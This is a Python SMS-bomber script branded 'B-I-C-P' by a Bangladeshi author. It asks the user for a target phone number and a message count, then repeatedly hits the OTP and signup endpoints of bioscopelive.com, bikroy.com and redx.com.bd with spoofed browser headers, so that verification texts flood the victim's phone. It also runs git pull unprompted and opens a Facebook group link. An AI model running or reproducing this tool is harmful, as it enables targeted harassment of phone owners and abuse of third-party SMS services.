import os
print("\033[1;92m [[[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]]] {B-I-C-P}SYSTEM INSTALL. . . . \033[1;30m")
os.system("pkg install espeak")
print("\033[1;92m   [[[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]]] ROBOT INSTALL COMPLETE \033[1;30m")
os.system('espeak -a 300 "Robot install complete"')
print("\033[1;92m   [[[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]][[ğŸ¥­]]] UPDATE CHECKING BOSS B-I-C-P \033[1;30m")
os.system('espeak -a 300 "WAITING FOR UPDATE BANGlADESH B-I-C-P OFF "')
os.system("git pull")
import os,requests,time
time.sleep(1)
os.system("clear")
os.system("xdg-open https://www.facebook.com/groups/299069722837609/?ref=share&mibextid=NSMWBT")
logo3=("""
  MEHEDI HASAN                                                                                                                  

\x1b[38;5;196m\033[38;5;46m[D]\033[38;5;46mğ€ğ”ğ“ğ‡ğğ‘   \x1b[38;5;196m    \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mMEHEDI Hasan  \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[N]\033[38;5;46mğ…ğ€ğ‚ğ„ğğğğŠ  \x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mBICP \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[B]\033[38;5;46mğ†ğˆğ“ğ‡ğ”ğ    \x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mB-I-C-P\x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[O]\033[38;5;46mğ“ğ„ğ‹ğ„ğ†ğ‘ğ€ğŒ  \x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mmehedi   \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[S]\033[38;5;46mğ…ğ‘ğğŒ     \x1b[38;5;196m    \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ \x1b[38;5;196m \033[38;5;46mğğ€ğğ†ğ‹ğ€ğƒğ„ğ’ğ‡       \x1b[38;5;196m 
\x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[00m\033[1;30m""")
os.system('espeak -a 300 "author MEHEDI HASAN  "')
os.system('espeak -a 300 "Facebook BANGLADESH ISLAMIC CYBER PROTECTOR  "')
os.system('espeak -a 300 "github BiCP"')
os.system('espeak -a 300 "telegram  t.me/BICP_Mission_Update"')
os.system('espeak -a 300 "from Bangladesh"')
print(logo3)
num=input("""  \033[38;5;46mTARGET NUMBER : +880""")
amount=int(input("\n  \033[38;5;46mSMS AMOUNT : "))
headers1={
			  "authority":"www.bioscopelive.com",
			  "method":"GET",
			  "scheme":"https",
			  "accept":"/",
			  "accept-encoding":"gzip, deflate, br",
			  "accept-language":"en-US,en;q=0.9,bn-BD;q=0.8,bn;q=0.7",
			  "if-none-match":'W/"5baf0d010507bc980255f9941283860a"',
			  "referer":"https://www.bioscopelive.com/en/login?bongoId=QPj10yOQIwI",
			  "save-data":"on",
			  "sec-ch-ua":'"Chromium";v="107", "Not=A?Brand";v="24"',
			  "sec-ch-ua-mobile":"?1",
			  "sec-ch-ua-platform":'Android',
			  "sec-fetch-dest":"empty",
			  "sec-fetch-mode":"cors",
			  "sec-fetch-site":"same-origin",
			  "user-agent":"Mozilla/5.0 (Linux; Android 10; Z28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36",
			  "x-requested-with":"XMLHttpRequest"
}
url1="https://www.bioscopelive.com/en/login/send-otp?phone=880"+num+"&operator=bd-otp"
headers2={
         "referer":"https://bikroy.com/bn/users/login?action=login&stack=webapp&redirect-url=/bn/users/login-options",
         "user-agent":"Mozilla/5.0 (Linux; Android 10; Z28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36"
}
url2="https://bikroy.com/data/phone_number_login/verifications/phone_login?phone=0"+num
data={
  "name": num,
  "phoneNumber": num,
  "service": "redx"
}
headers3={
  "referer":"https://redx.com.bd/",
  "user-agent":"Mozilla/5.0 (Linux; Android 10; Z28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36"
}
ses=0
while amount>ses:
  sent1=requests.get(url1,headers=headers1)
  if sent1.status_code==200:
    ses+=1
    print(f"\n{ses}  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  SMS WAS SENTâ˜ ")
  else:
    pass
  
  sent2=requests.get(url2,headers=headers2)
  if sent2.status_code==200:
    ses+=1
    print(f"\n{ses} \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  SMS WAS SENTâ˜ ")
  else:
    pass
  
  send3=requests.post("https://api.redx.com.bd/v1/user/signup",headers=headers3,data=data)
  if send3.status_code==200:
    ses+=1
    print(f"\n{ses} \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  SMS WAS SENTâ˜ ")
    
  else:
    pass
os.system("clear")
print(""" \033[1;32m
\x1b[38;5;196m SENâ˜        
  MEHEDI HASAN                                                                                                                
\x1b[38;5;196m \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[D]\033[38;5;46mğ€ğ”ğ“ğ‡ğğ‘   \x1b[38;5;196m \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46Mehedi \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[N]\033[38;5;46mğ…ğ€ğ‚ğ„ğğğğŠ  \x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46https://www.facebook.com/groups/299069722837609/?ref=share&mibextid=NSMWBT\x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[B]\033[38;5;46mğ†ğˆğ“ğ‡ğ”ğ    \x1b[38;5;196m  \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mehedi12130123 \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[O]\033[38;5;46mğ“ğ„ğ‹ğ„ğ†ğ‘ğ€ğŒ  \x1b[38;5;196m \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[38;5;46mt.me/Mehedi_Hasan_Nayeem   \x1b[38;5;196m
\x1b[38;5;196m\033[38;5;46m[S]\033[38;5;46mğ…ğ‘ğğŒ     \x1b[38;5;196m \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ \x1b[38;5;196m \033[38;5;46mğğ€ğğ†ğ‹ğ€ğƒğ„ğ’ğ‡       \x1b[38;5;196m 
\x1b[38;5;196m \033[38;5;46mğŸ¦‹âƒŸB-I-C-Pâœ®âƒ BOX11ğ„Ÿâƒ  \x1b[38;5;196m\033[00m\033[1;30m""")
